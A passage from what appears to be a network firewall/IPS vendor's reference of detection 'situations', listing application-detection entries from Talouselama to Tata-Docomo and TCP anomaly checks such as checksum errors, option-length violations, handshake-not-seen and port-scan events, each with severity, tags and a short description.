First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-706-5211
Description: Talouselama is the biggest weekly finance magazine in the Nordic countries.
Back to top

Taloussanomat

About this situation: Taloussanomat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1148-5242
Description: Taloussanomat is a Finnish daily business newspaper.
Back to top

Talygen

About this situation: Application Talygen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Talygen helps you to automate, regulate and enforce your corporate process with advanced features like Employee Management, Time Tracking with Screenshots, HR Enforcement, CRM.
Back to top

Tangerine

About this situation: Application Tangerine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tangerine is a direct bank that offers savings accounts, tax-free savings accounts, guaranteed investment certificates and registered retirement savings plans.
Back to top

Tango-Card

About this situation: Application Tango-Card detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tango Card the catalog of e-gift cards and other e-rewards with easy-to-use technology and expert program support to drive results.
Back to top

Tango-Messenger

About this situation: Tango Messenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1636-5242
Description: Tango is a free mobile instant messaging application that includes audio and video conversation.
Back to top

Tangoe

About this situation: Application Tangoe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tangoe help your connected enterprise reduce expense, increase operational efficiencies, reduce risk, enhance support, increase user satisfaction, and improve visibility.
Back to top

Tantum

About this situation: Application Tantum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tantum is integrated technology suite that combines CRM, HR, and ERP functionality and provides real-time analytics on the cloud.
Back to top

Taobao

About this situation: Taobao usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-623-5211
Description: Taobao usage detected. Taobao is a Chinese online shopping website.
Back to top

TapAd

About this situation: TapAd usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: TapAd is an on-line advertising service.
Back to top

TapAnalytics

About this situation: Application TapAnalytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TapAnalytics consolidates digital marketing analytics reporting with a digital dashboard.
Back to top

Tapatalk

About this situation: Application Tapatalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tapatalk is platform for mobile online communities.
Back to top

TapClicks

About this situation: Application TapClicks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TapClicks is an company that caters to digital agencies, local-media, and enterprise customers, with a suite of products including the TapAnalytics Marketing Reporting Dashboard.
Back to top

TapCrowd

About this situation: Application TapCrowd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TapCrowd helps companies to build, publish and maintain B2B2C mobile apps with a focus on building brand awareness, increasing customer loyalty, enabling personalised interactions and boosting revenue.
Back to top

Tapjoy---Mobile-Developers

About this situation: Application Tapjoy---Mobile-Developers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tapjoy is a mobile advertising and app monetization platform that allows mobile app users to select in-app advertising in exchange for virtual rewards and premium content.
Back to top

TappIn

About this situation: TappIn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: TappIn is a secure remote file access and online sharing platform/service.
Back to top

Taptera

About this situation: Application Taptera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Taptera develops mobile enterprise software solutions. It offers Colleagues, a mobile employee directory, and Sophia, a mobile application that allows salespeople to update Salesforce.com entries with call details and next steps from their mobile devices.
Back to top

TargetEveryOne

About this situation: Application TargetEveryOne detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TargetEveryOne provides a cloud based, mobile marketing and communication service. It helps create, distribute and analyse mobile landing pages, campaigns and sites.
Back to top

TargetProcess

About this situation: Application TargetProcess detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Targetprocess is a visual project management software that focuses on agile processes, including Scrum, Kanban and your own unique process.
Back to top

TargetX

About this situation: Application TargetX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TargetX helps colleges and universities customize and implement technology solutions. TargetX provides a campus wide solution to help colleges build relationships and forge communications with their constituencies, including prospective students, current students, alumni and potential donors
Back to top

Tarsnap

About this situation: Application Tarsnap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tarsnap is a secure online backup system for UNIX
Back to top

Task Execution Failed

About this situation: Task Execution Failed
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Task Execution Succeeded

About this situation: Task Execution Succeeded
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

Task Host

About this situation: Endpoint Context Agent based Windows Task Host detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection initiated by a Windows Task Host process was detected.
Back to top

TaskAnyone

About this situation: Application TaskAnyone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TaskAnyone is a web-based task and project management service which allows you to keep track of your daily to-dos plus send tasks to anyone with an email address. Tell your colleague, supplier or spouse what to do and all details, deadlines and updates will be logged until it's completed.
Back to top

TaskforceApp

About this situation: Application TaskforceApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Taskforce is a system that can help eliminate the hassle of handling the multitude of emails in inboxes. With Taskforce, emails can be converted into individual tasks that can be monitored and completed.
Back to top

TaskStream

About this situation: Application TaskStream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Taskstream's cloud-based tools advance effective assessment and help you set strategic goals, address accountability, and demonstrate continuous improvement.
Back to top

Tasktop-Sync

About this situation: Application Tasktop-Sync detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tasktop Sync is an integration server that provides fully automated, enterprise-grade synchronization among the artifacts created and managed within the disparate tools used in software development and delivery organizations. Tasktop Sync works in the background, keeping the flow of information among the practitioners and their tools constant. Everyone works in their tool of choice, but has real-time access to the changes other team members are making in their tools.
Back to top

TASS.web

About this situation: Application TASS.web detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TASS.web is a web-based school administration system designed for K-12 schools.
Back to top

Tasteless

About this situation: Sites with content that is gratuitously offensive or shocking, but not violent or frightening. Includes sites devoted in part or whole to scatology and similar topics or to improper language, humor or behavior.
Context: URL Application Context
Severity: 1
Tags: Tasteless, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites with content that is gratuitously offensive or shocking, but not violent or frightening. Includes sites devoted in part or whole to scatology and similar topics or to improper language, humor or behavior.
Back to top

TATA-Consultancy-Services

About this situation: Application TATA-Consultancy-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TATA Consultancy Services is an IT services, business solutions and outsourcing organization that delivers results to businesses.
Back to top

Tata-Docomo

About this situation: Application Tata-Docomo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tata Docomo is a mobile telecommunications service provider company.
Back to top

Taulia

About this situation: Application Taulia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Taulia provides cloud-based invoice, payment and discount management solutions for large buying organizations.
Back to top

TaxCloud

About this situation: Application TaxCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TaxCloud is a service that calculates the sales tax due on transaction.
Back to top

Tcould

About this situation: tcould usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is a korean storage site.
Back to top

TCP_Active-RTO

About this situation: Retransmission timeout in active TCP stream
Context: TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Retransmission timeout occurred in active mode TCP stream and engine will start retransmitting data. This is normal to happen in case of packet loss. Risk analysis: Risk level is none.
Back to top

TCP_Checksum-Mismatch

About this situation: TCP checksum is incorrect
Context: TCP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: TCP checksum is incorrect. Such segment should not be generated nor accepted by the recipient. TCP segments with incorrect checksum typically result from faulty networking devices or random errors in the network communications. Risk analysis: Risk level is fairly low. Hosts ignore TCP packets with erroneous checksum, so it is unlikely that this event is harmful. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Client-Data-Missing

About this situation: TCP client stream has missed some bytes.
Context: TCP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1109-5242
Description: TCP client stream has missed some bytes.
Back to top

TCP_Connection-Loose-Discarded

About this situation: TCP loose connection open forbidden by the access rules
Context: TCP without parameters
Severity: 1
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-112-2032
Last changed: sgpkg-ips-493-5211
Description: A TCP segment was received for a connection where the handshake has not been seen, and the access rules or blacklisting entries prevent opening connections in this direction in the inline mode. Furthermore, opening the connection in the other direction would be allowed, so that the situations Connection_Discarded or Connection_Refused cannot be reliably applied for this connection. Because the handshake direction is not known, this segment is discarded to be safe. The action for this situation in the inspection rules has no effect, it is automatically Terminate. If you want to allow loose connection open in this direction, add an allowing rule in the access rules.
Back to top

TCP_Connections-Too-Many

About this situation: Unable to allocate memory for new connection
Context: TCP without parameters
Severity: 1
Tags: Inspection, SSM Informative Messages
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The engine is unable to allocate memory for new connection, either because no memory was available or because there are too many connections. Note: The default handling for this situation is to drop the packet without logging. However, as IDS is unable to drop the connection, it ignores the connection instead. When more memory becomes available, the remaining part of the connection will be analyzed.
Back to top

TCP_Empty-FIN-Segment-Content-Conflict

About this situation: Empty TCP FIN segment conflicts with data
Context: TCP without parameters
Severity: 7
Tags: Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1087-5242
Last changed: sgpkg-ips-1087-5242
Description: An empty TCP FIN segment conflicts with known non-FIN sequence number. Risk analysis: Risk level is medium. Typically, this situation occurs when an attacker tries to evade intrusion detection by making the TCP data stream ambiguous. This situation does not occur in normal TCP connections but may be produced by broken TCP implementations. Terminate action for the situation terminates the TCP connection. With permit the conflicting segment is allowed, but the connection tracking is not affected by the packet which may result in slower removal of the connection state if the receiver of the FIN accepts it. To remediate the resulting resource issue the TCP timeouts should be configured accordingly.
Back to top

TCP_FIN-Data-After

About this situation: Current segment conflicts with previously seen FIN
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: The TCP datagram conflicts with previously seen FIN from the same endpoint, i.e. the datagram contains data beyond the previously seen FIN or the datagram has FIN set which has different sequence number than the previous one. Note: Terminate action for the situation terminates the TCP connection. Without termination only the conflicting segment (i.e. the later coming one) is dropped. Risk analysis: Risk level is medium. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack, or a duplicate of very old segment in connection that has transferred over 4 gigabytes of data. Terminate action for the situation terminates the TCP connection.
Back to top

TCP_Future-Acknowledgement-Number-Always

About this situation: Generate "TCP Future Acknowledgement Number" situations without online grace period
Context: TCP Future Acknowledgement Number
Severity: 2
Tags: Inspection
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-424-4219
Description: This situation occurs when a normal mode TCP inline segment of a connection that carries an acknowledgement number in the future in comparison to sequence numbers seen on the inspected opposite direction stream. This situation is always generated - graceful online period does not apply. (See context description for further important details.)
Back to top

TCP_Future-Acknowledgement-Number-Graceful

About this situation: Generate "TCP Future Acknowledgement Number" situations after online grace period
Context: TCP Future Acknowledgement Number
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Description: This situation occurs when a normal mode TCP inline segment of a connection that carries an acknowledgement number in the future in comparison to sequence numbers seen on the inspected opposite direction stream. This situation is generated after the graceful online period. (See context description for further important details.)
Back to top

TCP_Future-Acknowledgement-Number-Never

About this situation: Do not generate "TCP Future Acknowledgement Number" situations
Context: TCP Future Acknowledgement Number
Severity: 2
Tags: Inspection
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-424-4219
Description: This situation never triggers. Its' purpose is to be used as whitelisting tool in a policy that has other "TCP future acknowledgement number" situations. It overrides other such situations which could trigger. Typical usage scenario for this situation is a rule specific to a server for which continuity of TCP connections is more important than antievasion robustness over events such as bypass events and appliance reboots.
Back to top

TCP_Handshake-Not-Seen-Always

About this situation: Generate "no handshake seen" situations without online grace period
Context: TCP Handshake Not Seen
Severity: 2
Tags: Inspection
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-424-4219
Description: This situation occurs when an inline TCP segment that doesn't belong to any inspected connection is seen, and the segment doesn't start a handshake. This situation is always generated - graceful online period does not apply. (See context description for details.)
Back to top

TCP_Handshake-Not-Seen-Graceful

About this situation: Generate "no handshake seen" situations after online grace period
Context: TCP Handshake Not Seen
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Description: This situation occurs when an inline TCP segment that doesn't belong to any inspected connection is seen, and the segment doesn't start a handshake. This situation is generated after the graceful online period. (See context description for details.) It is common that these situations occur occassionally as "false positives." Some reasons for this are hosts that are suspended and woken up (which can cause connections to time out on the IPS in several ways) and hosts that are rebooted (which can also cause silent timeouts). Interaction with mechanisms such as layer 2 forwarding table expiration and ARP table expiration can also cause an anomalous view of the traffic from the perspective of the inspecting device. Usually these false positives are harmless and caused in a state where the connection is already essentially dead, or the connection that doesn't actually traverse the engine.
Back to top

TCP_Handshake-Not-Seen-Never

About this situation: Do not generate "no handshake seen" situations
Context: TCP Handshake Not Seen
Severity: 2
Tags: Inspection
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-424-4219
Description: This situation never triggers. Its' purpose is to be used as whitelisting tool in a policy that has other "handshake not seen" situations. It overrides other such situations which could trigger. Typical usage scenario for this situation is a rule specific to a server for which continuity of TCP connections is more important than antievasion robustness over events such as bypass events and appliance reboots.
Back to top

TCP_Header-Length-Error

About this situation: TCP segment with erroneous header length
Context: TCP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Vulnerability: TCP_Linux-Kernel-Firewall-Logging-Denial-Of-Service
Description: The TCP header does not fit in the IP payload or TCP header length field contains an invalid value. This type of TCP datagram should not be generated according to the TCP/IP specifications. The packet was either corrupted in transit or it was crafted manually. Such a packet should not be accepted by the receiving host or forwarded by any intermediate router. Risk analysis: Risk level is low. Some hosts that do not properly check the TCP datagram header length could be vulnerable to a denial of service or execution of arbitrary code. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Initial-Window-Too-Large

About this situation: Connection uses larger window before the first ACK than specified
Context: TCP Too Many Initial Window Bytes
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-486-5211
Description: This situation occurs when more than 16 kilobytes of TCP payload is sent after handshake before the first corresponding ACK.
Back to top

TCP_Initial-Window-Too-Many-Segments

About this situation: Connection uses more segments before the first ACK than specified
Context: TCP Too Many Initial Window Segments
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Description: This situation occurs when more than ten segments are sent after handshake before the first corresponding ACK.
Back to top

TCP_Microsoft-Windows-Timestamp-Code-Execution

About this situation: Windows TCP Timestamp Code Execution Exploit
Context: TCP without parameters
Severity: 5
Tags: Potential Compromise
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-463-5211
Vulnerability: Microsoft-TCP-Timestamp-Memory-Corruption
Description: The sensor has detected potential exploit of Windows TCP/IP Timestamps Code Execution Vulnerability (CVE-2009-1925). More precisely, it has detected specially crafted TCP packet of TCP handshake that may indicate the exploit to above mentioned vulnerability. Risk analysis: Risk level is medium/high. Note: Terminate action for the situation terminates the TCP connection.
Back to top

TCP_Option-Invalid

About this situation: TCP option has invalid length
Context: TCP without parameters
Severity: 6
Tags: Potential Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Description: The TCP header contains a TCP Options field with incorrect length so that the option's value cannot be used. Risk analysis: Risk level is medium. This type of TCP datagram should not be generated according to the TCP/IP specifications. This may be generated by defective TCP endpoint stack or the packet could have been crafted manually to exploit a vulnerability in some TCP/IP implementations, or for information gathering based on the target's reply. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Option-Too-Long

About this situation: TCP option requires more space than available in TCP header
Context: TCP without parameters
Severity: 6
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The TCP header contains a TCP Options field that requires more space than available in the TCP header. Risk analysis: Risk level is medium. This type of TCP datagram should not be generated according to the TCP/IP specifications. The packet was probably crafted manually to exploit a vulnerability in some TCP/IP implementations, or for information gathering based on the target's reply. Most relevant log fields: "TCP option number" shows the TCP Option number in the TCP header. "TCP option length" shows the length of the exceedingly long TCP Option. (Unless the option was in the last byte of TCP options, in which the length could not be determined).
Back to top

TCP_Option-Too-Short

About this situation: TCP option contains illegally small value in length field
Context: TCP without parameters
Severity: 6
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The TCP header contains a TCP Options field with length field values 0 or 1. Risk analysis: Risk level is medium. This type of TCP datagram should not be generated according to the TCP/IP specifications. The packet was probably crafted manually to exploit a vulnerability in some TCP/IP implementations, or for information gathering based on the target's reply. Most relevant log fields: "TCP option number" shows the TCP Option number in the TCP header. "TCP option length" shows the length of the exceedingly short TCP Option.
Back to top

TCP_Option-Unhandled

About this situation: TCP option is not supported
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Description: The TCP header contains an option which is not supported by the NGFW. If this situation is configured with Terminate action, the option will be stripped from the traffic. If this situation is configured with Permit action, the option is left in the traffic. This situation is produced by NGFW versions 6.11.1 and newer. The situation TCP_Option-Unsupported is produced by NGFW versions 6.11.0 and older from the same content. Note: The situation TCP_Option-Unknown may be triggered from the same traffic. When that situation is configured with Terminate action, the packet will be dropped. Note: If inspection is in active mode, these options will always be stripped off from the traffic. This is done to ensure that the connection does not utilize features not supported by the NGFW. Risk analysis: Risk level is medium.
Back to top

TCP_Option-Unknown

About this situation: TCP option is not known
Context: TCP without parameters
Severity: 2
Tags: Potential Invalid Packet Attacks
First detected in: sgpkg-ips-1336-5242
Last changed: sgpkg-ips-1475-5242
Description: The TCP header contains an option whose behavior is not known to the NGFW. If this situation is configured with Terminate action, the packet will be dropped. If this situation is configured with Permit action, the packet will be permitted through. Note: If the traffic is being inspected, the situation TCP_Option-Unsupported may be triggered from the same traffic. When this situation is configured with Terminate action, these options will be stripped from the traffic. Also, when the connection is in active mode, these options will always be stripped from the traffic. This is done to ensure that the connection does not utilize features not supported by the NGFW. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Option-Unsupported

About this situation: TCP option is not unsupported
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1345-5242
Description: The TCP header contains an option which is not supported by the NGFW. If this situation is configured with Terminate action, the option will be stripped from the traffic. If this situation is configured with Permit action, the option is left in the traffic. This situation is produced by NGFW versions 6.11.0 and older. The situation TCP_Option-Unhandled is produced by NGFW versions 6.11.1 and newer from the same content. Note: The situation TCP_Option-Unknown may be triggered from the same traffic. When that situation is configured with Terminate action, the packet will be dropped. Note: If inspection is in active mode, these options will always be stripped off from the traffic. This is done to ensure that the connection does not utilize features not supported by the NGFW. Risk analysis: Risk level is medium.
Back to top

TCP_Options-Detected

About this situation: TCP datagram with TCP options was detected
Context: TCP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-549-5211
Description: A TCP datagram with TCP options was detected. TCP options are frequently used with TCP segments. Risk analysis: Risk level is none.
Back to top

TCP_Options-Length-Inconsistency

About this situation: TCP options field with extra padding
Context: TCP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: A TCP header with TCP Options has more padding than necessary. Typically the TCP Options field is as short as possible. The detected datagram has more padding in the TCP Options field than is necessary. Even though this type of TCP datagram should not be generated according to the TCP/IP specifications, they are commonly seen in valid Internet traffic. Risk analysis: Risk level is low.
Back to top

TCP_Options-Unused

About this situation: TCP Options after End Of Options field
Context: TCP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-306-4219
Description: TCP Options detected in a TCP header after the End Of Options field. It is customary to clear the remaining part of the TCP Options field. However, it may contain additional data as long as End Of Options mark is in its place. Risk analysis: Risk level is low. Most relevant log fields: "TCP option number" shows the TCP Option number in the TCP header.
Back to top

TCP_Portscan_End

About this situation: The timewindow for TCP portscan events has ended
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: This situation is sent after a TCP_Portscan_Started situation when the specified timewindow has been exceeded. The informational message field will show summary of the ports and hosts scanned.
Back to top

TCP_Portscan_Started

About this situation: TCP Portscan has started
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: The threshold value for TCP portscan events within the specified timewindow has been exceeded. TCP portscan is in progress. A summary situation will be sent at the end of the timewindow.
Back to top

TCP_Segment-ACK-Expected

About this situation: SYN-ACK from client was seen instead of ACK on a handshake
Context: TCP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: A SYN-ACK packet was seen from connection initiator (client) in TCP handshake, when only ACK or SYN retransmit is expected. A SYN-ACK packet is used only by server in a conventional three-way handshake. Combining SYN retransmission and ACK to client SYN-ACK is valid TCP behavior, but it serves no useful purpose. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Segment-Content-Conflict

About this situation: TCP segments have conflicting data bytes
Context: TCP without parameters
Severity: 7
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-345-4219
Description: Two overlapping TCP segments have conflicting data bytes. Risk analysis: Risk level is medium. Typically, this situation occurs when an attacker tries to evade intrusion detection by making the TCP data stream ambiguous. Note: Note checking for this situation consumes notable amount of computing resources. The resources can be preserved by not configuring this situation for all or some part of the traffic. Terminate action for the situation terminates the TCP connection. Without termination only the conflicting segment (i.e. the later coming one) is dropped.
Back to top

TCP_Segment-Invalid

About this situation: Illegal TCP packet seen
Context: TCP without parameters
Severity: 4
Tags: Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Vulnerability: FreeBSD-TCP-Reassembly-Denial-Of-Service
Description: An illegal TCP packet was seen. TCP packets always either contain an ACK bit (all packets after the connection establishment) or have the SYN bit set (during connection establishment) or have RST bit. However, a packet was detected that did not contain any of these flags. Such a segment should not be generated by a standards-compliant host. Risk analysis: Risk level is low. These kinds of packets could be part of a TCP NULL, XMAS, or FIN scan. These scans are widely used, because they are known to bypass some simple firewalls. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

TCP_Segment-Nonzero-ACK-Value

About this situation: No ACK flag but nonzero acknowledgment field value
Context: TCP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-454-4333
Description: A nonzero acknowledgement field value was seen on a segment which didn't have ACK flag set. Conventionally this field is set to zero when it's not used. Risk analysis: Risk level is low. This can be, for example, an inspection evasion attempt, TCP/IP stack detection probe, a malfunction of a certain TCP/IP stack or so on.
Back to top

TCP_Segment-SYN-ACK-Unexpected

About this situation: SYN-ACK packet seen in established connection
Context: TCP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
